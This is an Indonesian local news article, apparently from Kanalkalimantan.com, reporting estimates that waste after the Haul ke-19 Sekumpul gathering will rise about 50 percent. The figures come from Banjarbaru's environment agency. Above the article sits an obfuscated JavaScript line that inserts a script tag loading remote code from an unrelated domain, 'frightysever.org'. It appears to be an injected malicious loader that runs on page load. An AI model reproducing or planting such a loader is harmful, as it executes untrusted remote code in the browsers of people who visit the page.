(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Tahun Lalu Capai 1.000 Ton, Sampah Pasca Haul Diprediksi Naik 50 Persen


KANALKALIMANTAN.COM, BANJARBARU – Sampah yang dihasilkan selama pelaksanaan kegiatan Haul ke-19 Sekumpul diperkirakan mencapi 1.000 ton lebih.

Kepala Dinas Lingkungan Hidup Kota Banjarbaru, Sirajoni mengatakan, angka itu dapat diperkirakan dari jumlah jemaah yang datang.

Yang mana jika berkaca pada haul sebelum pandemi Covid-19 lalu saja, jumlah sampah yang dihasilkan sebanyak 1.000 ton.

Maka haul tahun ini dengan jemaah yang mencapai 3,3 juta kenaikan volume sampah diperkirakan bertambah 50 persen.

Baca juga: Fenomena Sirkulasi Siklonik Bikin Hujan Terus Menguyur Kalsel, Begini Penjelasan BMKG

“Kita berkaca dari haul sebelum pandemi dengan data ada 2,5 juta lebih jemaah yang datang sampah yang dihasilkan pasca acara sekitar 1.000 ton. Sekarang 3,3 juta jemaah, maka kita perkiraan kenaikannya 50 persen,” kata Kepala DLH Banjarbaru, Sirajoni, Selasa (16/1/2024).

Data itu pun didapat jika volume sampah digabungkan dari seluruh wilayah baik Kota Banjarbaru, Kabupaten Banjar maupun Banjarmasin.

Terlebih sambung dia, pada H-3 setelah haul, DLH Banjarbaru menghitung peningkatan volume sampah sudah terjadi di ibu kota provinsi.

“Di Banjarbaru sendiri sebelum haul saja itu ada kenaikan sampah hingga mencapai 30 ton per harinya. Biasanya di bawah itu, belum ditambah dari daerah lainnya,” sebut dia.

Baca juga: Pj Bupati HSU Melantik 6 Pejabat, Ini Nama-namanya

Hingga saat ini, katanya, pembersihan sampah pasca haul masih berlangsung.

“Pengangkutan sumpahnya belum selesai, biasanya sampai seminggu, tapi ini kita tidak tau, mungkin bisa lebih lama karena ada lonjakan jemaah yang hadir,” ungkap Sirajoni.

Sistem pengangkutan dijelaskannya, sampah-sampah yang ada di dapur umum dikumpulkan oleh relawan, dibawa ke tempat penampungan sementara, kemudian diambil lagi oleh truk pengangkut sampah masing-masing daerah.

Untuk data keseluruhan nantinya ia menyebutkan akan direkap saat semua pengangkutan sampah itu dari berbagai wilayah rampung.

Sementara itu, DLH Banjarbaru sudah menyiapkan sekitar 20 armada pengangkut sampah, jika diperlukan lebih banyak lagi pihaknya siap menerjunkan armada tambahan.

Baca juga: Dipasang Sembarang, 34 APK Parpol dan Caleg di Banjarbaru Melanggar Aturan

“Karena itu sifatnya situasional kan, yang jelas sekarang kami siapkan 20 armada, dan siap membackup full dengan kekuatan yang ada jika diperlukan,” tegasnya.

Lebih jauh Sirajoni menerangkan, saat ini sampah-sampah usai kegiatan yang masih berserakan di jalan raya sekitar 60 persen telah rampung dibersihkan oleh petugas kebersihan baik dari Kota Banjarbaru maupun Kabupaten Banjar. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie

 


Risa

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

5 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

7 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

10 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

11 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

12 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

13 jam ago

This website uses cookies.